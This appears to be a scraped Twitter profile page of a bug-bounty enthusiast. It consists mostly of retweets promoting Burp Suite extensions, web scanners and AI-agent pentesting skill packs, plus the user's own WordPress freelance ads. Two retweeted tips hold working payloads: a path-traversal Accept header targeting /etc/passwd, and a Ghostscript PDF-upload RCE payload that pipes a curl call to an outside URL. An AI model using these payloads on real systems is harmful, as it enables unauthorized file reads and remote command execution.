Naser Mahmud 🇵🇸 @enginesec - Twitter Profile

enginesec retweeted

Geek Lite

@QingQ77

12 days ago

给 Claude Code 装一套漏洞赏金和红队渗透技能包，51 个技能、574+ 报告模式、24 个漏洞类，一装就变身老练研究员。 https://t.co/Gaz5IoC1L4

18

825

132

920

41K

enginesec retweeted

TheOuts1derX

@TheOuts1derX

24 days ago

A collection of AI agent prompts for bug bounty and pentesting workflows: https://t.co/JeIkgaSmAv #BugBounty #Pentesting #AIAgents #InfoSec #HackingTools

1

364

79

364

14K

enginesec retweeted

Awais Nazeer @awais0x1

about 1 month ago

I just published Find SQL injection with burp Suite scanner https://t.co/8xPuLhC8Cu

4

178

25

136

13K

enginesec retweeted

Vivek | Cybersecurity

@VivekIntel

about 1 month ago

🧰 𝗠𝗨𝗦𝗧-𝗛𝗔𝗩𝗘 𝗕𝗨𝗥𝗣 𝗦𝗨𝗜𝗧𝗘 𝗘𝗫𝗧𝗘𝗡𝗦𝗜𝗢𝗡𝗦 𝗙𝗢𝗥 𝗪𝗘𝗕 𝗣𝗘𝗡𝗘𝗧𝗥𝗔𝗧𝗜𝗢𝗡 𝗧𝗘𝗦𝗧𝗜𝗡𝗚 ━━━━━━━━━━━━━━━━━━ 🔐 𝗔𝗨𝗧𝗛𝗢𝗥𝗜𝗭𝗔𝗧𝗜𝗢𝗡 & 𝗔𝗖𝗖𝗘𝗦𝗦 𝗖𝗢𝗡𝗧𝗥𝗢𝗟 • BurpLay → replay requests to detect privilege escalation • AuthMatrix → test access across roles • Autorize → auto-detect authorization flaws • Auth Analyzer → test with custom tokens • Burp SessionAuth → session-based privilege issues • Authz → quick authorization testing ━━━━━━━━━━━━━━━━━━ 🔁 𝗥𝗘𝗤𝗨𝗘𝗦𝗧 𝗔𝗨𝗧𝗢𝗠𝗔𝗧𝗜𝗢𝗡 • AutoRepeater → automate request replay + diff • IncrementMe Please → auto-increment parameters ━━━━━━━━━━━━━━━━━━ 🔍 𝗥𝗘𝗖𝗢𝗡 & 𝗗𝗜𝗦𝗖𝗢𝗩𝗘𝗥𝗬 • LinkFinder → extract endpoints from JS • JS Miner / JS Parser → find sensitive data in JS ━━━━━━━━━━━━━━━━━━ 🔐 𝗧𝗢𝗞𝗘𝗡 & 𝗔𝗨𝗧𝗛 𝗧𝗘𝗦𝗧𝗜𝗡𝗚 • JWT Editor → test JWT vulnerabilities • Turbo Intruder → high-speed attacks (race, brute) ━━━━━━━━━━━━━━━━━━ 🧪 𝗙𝗨𝗭𝗭𝗜𝗡𝗚 & 𝗦𝗖𝗔𝗡𝗡𝗜𝗡𝗚 • ActiveScan++ → improved scanning coverage • Backslash Powered Scanner → injection detection ━━━━━━━━━━━━━━━━━━ 📦 𝗔𝗗𝗩𝗔𝗡𝗖𝗘𝗗 𝗔𝗧𝗧𝗔𝗖𝗞𝗦 • HTTP Request Smuggler → find smuggling bugs • Content Type Converter → bypass filters ━━━━━━━━━━━━━━━━━━ 🧠 𝗣𝗥𝗢𝗗𝗨𝗖𝗧𝗜𝗩𝗜𝗧𝗬 • Logger++ → advanced request logging • Flow → visualize request flow ━━━━━━━━━━━━━━━━━━ ⚠️ 𝗥𝗘𝗔𝗟𝗜𝗧𝗬 Installing tools ≠ finding bugs Understanding logic = finding bugs ━━━━━━━━━━━━━━━━━━ 🎯 𝗨𝗦𝗘 𝗧𝗛𝗜𝗦 𝗟𝗜𝗞𝗘 𝗔 𝗣𝗥𝗢 Start with recon → test auth → fuzz → automate → verify ━━━━━━━━━━━━━━━━━━ 🔗 𝗕𝘂𝗿𝗽 𝗘𝘅𝘁𝗲𝗻𝘀𝗶𝗼𝗻𝘀 (𝗢𝗳𝗳𝗶𝗰𝗶𝗮𝗹) https://t.co/UrWqcuPRJe ━━━━━━━━━━━━━━━━━━ #BurpSuite #WebSecurity #Pentesting #BugBounty #InfoSec

VivekIntel's tweet photo. 🧰 𝗠𝗨𝗦𝗧-𝗛𝗔𝗩𝗘 𝗕𝗨𝗥𝗣 𝗦𝗨𝗜𝗧𝗘 𝗘𝗫𝗧𝗘𝗡𝗦𝗜𝗢𝗡𝗦
𝗙𝗢𝗥 𝗪𝗘𝗕 𝗣𝗘𝗡𝗘𝗧𝗥𝗔𝗧𝗜𝗢𝗡 𝗧𝗘𝗦𝗧𝗜𝗡𝗚

━━━━━━━━━━━━━━━━━━

🔐 𝗔𝗨𝗧𝗛𝗢𝗥𝗜𝗭𝗔𝗧𝗜𝗢𝗡 & 𝗔𝗖𝗖𝗘𝗦𝗦 𝗖𝗢𝗡𝗧𝗥𝗢𝗟

• BurpLay → replay requests to detect privilege escalation
• AuthMatrix → test access across roles
• Autorize → auto-detect authorization flaws
• Auth Analyzer → test with custom tokens
• Burp SessionAuth → session-based privilege issues
• Authz → quick authorization testing

━━━━━━━━━━━━━━━━━━

🔁 𝗥𝗘𝗤𝗨𝗘𝗦𝗧 𝗔𝗨𝗧𝗢𝗠𝗔𝗧𝗜𝗢𝗡

• AutoRepeater → automate request replay + diff
• IncrementMe Please → auto-increment parameters

━━━━━━━━━━━━━━━━━━

🔍 𝗥𝗘𝗖𝗢𝗡 & 𝗗𝗜𝗦𝗖𝗢𝗩𝗘𝗥𝗬

• LinkFinder → extract endpoints from JS
• JS Miner / JS Parser → find sensitive data in JS

━━━━━━━━━━━━━━━━━━

🔐 𝗧𝗢𝗞𝗘𝗡 & 𝗔𝗨𝗧𝗛 𝗧𝗘𝗦𝗧𝗜𝗡𝗚

• JWT Editor → test JWT vulnerabilities
• Turbo Intruder → high-speed attacks (race, brute)

━━━━━━━━━━━━━━━━━━

🧪 𝗙𝗨𝗭𝗭𝗜𝗡𝗚 & 𝗦𝗖𝗔𝗡𝗡𝗜𝗡𝗚

• ActiveScan++ → improved scanning coverage
• Backslash Powered Scanner → injection detection

━━━━━━━━━━━━━━━━━━

📦 𝗔𝗗𝗩𝗔𝗡𝗖𝗘𝗗 𝗔𝗧𝗧𝗔𝗖𝗞𝗦

• HTTP Request Smuggler → find smuggling bugs
• Content Type Converter → bypass filters

━━━━━━━━━━━━━━━━━━

🧠 𝗣𝗥𝗢𝗗𝗨𝗖𝗧𝗜𝗩𝗜𝗧𝗬

• Logger++ → advanced request logging
• Flow → visualize request flow

━━━━━━━━━━━━━━━━━━

⚠️ 𝗥𝗘𝗔𝗟𝗜𝗧𝗬

Installing tools ≠ finding bugs
Understanding logic = finding bugs

━━━━━━━━━━━━━━━━━━

🎯 𝗨𝗦𝗘 𝗧𝗛𝗜𝗦 𝗟𝗜𝗞𝗘 𝗔 𝗣𝗥𝗢

Start with recon → test auth → fuzz → automate → verify

━━━━━━━━━━━━━━━━━━

🔗 𝗕𝘂𝗿𝗽 𝗘𝘅𝘁𝗲𝗻𝘀𝗶𝗼𝗻𝘀 (𝗢𝗳𝗳𝗶𝗰𝗶𝗮𝗹)
https://t.co/UrWqcuPRJe

━━━━━━━━━━━━━━━━━━

#BurpSuite #WebSecurity #Pentesting #BugBounty #InfoSec

0

373

84

386

14K

Who to follow

MyAirTrade

@MyAirTrade

For professionals involved with trading, financing and management of commercial aircraft and engines

Quantum Kids Project (Hirofumi Yanagisawa)

@QuantumKidsP

We will develop affordable electron microscopes for observing a quantum world in a single molecule and start quantum education for kids at school.

川端一成 | WEIN / BACKSTAGE CAIO

@kaz_photon

WEIN/BACKSTAGE Group CAIO（最高AI責任者）| 実践型AIスクール「AI+」共同代表 | 現職←TIER IV←米国駐在←Canon | 挑戦する人を増やしたい、日本の景気を良くしたい | 3年で1万人のAI人材を輩出します🔥

enginesec retweeted

Vivek | Cybersecurity

@VivekIntel

about 1 month ago

Bug Hunter: Turn Any AI Coding Agent into an Adversarial Security Reviewer 🐛⚔️ Triage → Recon → Hunt → Skeptic → Referee → Auto-Fix → Verify Finds real bugs, kills false positives, and safely patches code with CVE, STRIDE & CVSS context — built for devs who don’t trust blind AI reviews. https://t.co/IOk3C6aJJs #AppSec #AIsecurity #bugbounty #SecureCoding #DevSecOps

VivekIntel's tweet photo. Bug Hunter: Turn Any AI Coding Agent into an Adversarial Security Reviewer 🐛⚔️

Triage → Recon → Hunt → Skeptic → Referee → Auto-Fix → Verify

Finds real bugs, kills false positives, and safely patches code with CVE, STRIDE & CVSS context — built for devs who don’t trust blind AI reviews.

https://t.co/IOk3C6aJJs

#AppSec #AIsecurity #bugbounty #SecureCoding #DevSecOps

2

273

46

302

13K

enginesec retweeted

Vivek | Cybersecurity

@VivekIntel

about 1 month ago

Wapiti: Automated Web App Vulnerability Scanner for Real-World Pentesting. 🕷️💀 Black-box scanning engine that crawls apps, fuzzes inputs, and detects SQLi, XSS, SSRF, XXE, RCE, and more — all without source code access. Built for practical security testing, API scanning, and bug hunting workflows. 👉 https://t.co/0lI8j05cRY #CyberSecurity #Pentesting #bugbounty #AppSec #Infosec

4

258

46

219

11K

Naser Mahmud 🇵🇸 @enginesec

about 1 month ago

@ghostlulz1337 is it available ?

1

0

5

enginesec retweeted

OccupytheWeb

@three_cube

6 months ago

Web App Hacking: Finding Web App Vulnerabilities with Caido Scanner Caido just became a serious Burp killer. Scanner plugin auto-detects vulns as you browse + launches targeted attacks on suspicious endpoints: https://t.co/wkiXeRK5CU

three_cube's tweet photo. Web App Hacking: Finding Web App Vulnerabilities with Caido Scanner

Caido just became a serious Burp killer.

Scanner plugin auto-detects vulns as you browse + launches targeted attacks on suspicious endpoints:

https://t.co/wkiXeRK5CU https://t.co/XcL7FFqTK7

16

1K

225

1K

55K

enginesec retweeted

BRute Logic @BRuteLogic

3 months ago

Check out our ebooks. https://t.co/HZrTkxdNwF #BugBounty #SSRF #Bypass

2

52

10

33

6K

enginesec retweeted

Arour_mohamed @Arourmohamed01

about 2 months ago

This extension got me bounty don't forget to install it #bugbounty #hack #security

17

365

34

401

22K

Naser Mahmud 🇵🇸 @enginesec

7 months ago

@aditiloves29 @grok DSA

1

0

17

Naser Mahmud 🇵🇸 @enginesec

10 months ago

https://t.co/prR7OIzH4Y #expericeWebDeveloper #SeniorwebDeveloper #wordpressdeveloper

0

18

Naser Mahmud 🇵🇸 @enginesec

10 months ago

https://t.co/prR7OIzH4Y #wordpressresponsive #wordpresswebsite #webdesign

0

1

0

21

Naser Mahmud 🇵🇸 @enginesec

10 months ago

https://t.co/prR7OIzH4Y #WordPressDev #WebDev #CodingLife #TechCommunity #WPDeveloper #WebDesign #DevLife #Programming #TechTrends #WordPress

0

1

0

22

Naser Mahmud 🇵🇸 @enginesec

10 months ago

Check out my Gig on Fiverr: do wordpress website design and development, redesign with 1 year free support https://t.co/mv6RBcm8Ps

0

19

enginesec retweeted

Emad Shanab - أبو عبد الله @Alra3ees

about 1 year ago

BurpFinder500: Extension for burp developed to store 500 errors during an analysis. https://t.co/6MsYdzvAmZ

1

89

25

47

4K

enginesec retweeted

𝕏 Bug Bounty Writeups 𝕏

@bountywriteups

over 1 year ago

WaybackURLs for Bug Bounty: How to Find Hidden Vulnerabilities & Sensitive Data https://t.co/5w26h5PyzG #bugbounty #bugbountytips #bugbountytip

0

71

26

42

4K

enginesec retweeted

Vedant Roy @Gh05t4s1

over 1 year ago

@CristiVlad25 Download all the js files using JS beautifier and then run trufflehog and gitleaks on it. Made some pretty decent bounties using it. If you are into AI, I would say build a script which uses API key of any good AI and give a prompt to find information.

3

88

9

94

7K

enginesec retweeted

khan mamun @mamunwhh

over 1 year ago

`Accept: ../../../../../../../../../../etc/passwd{{` #bugbountytips

1

243

41

159

9K

enginesec retweeted

Md Ismail Šojal 🕷️ @0x0SojalSec

over 1 year ago

RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl https://t.co/AgOXKQpkA5) ) .putdeviceparams quit https://t.co/B4hJqpPlGf

2

270

64

176

11K

Naser Mahmud 🇵🇸

@enginesec

Who to follow

Last Seen Users on Sotwe

Trends for you

Most Popular Users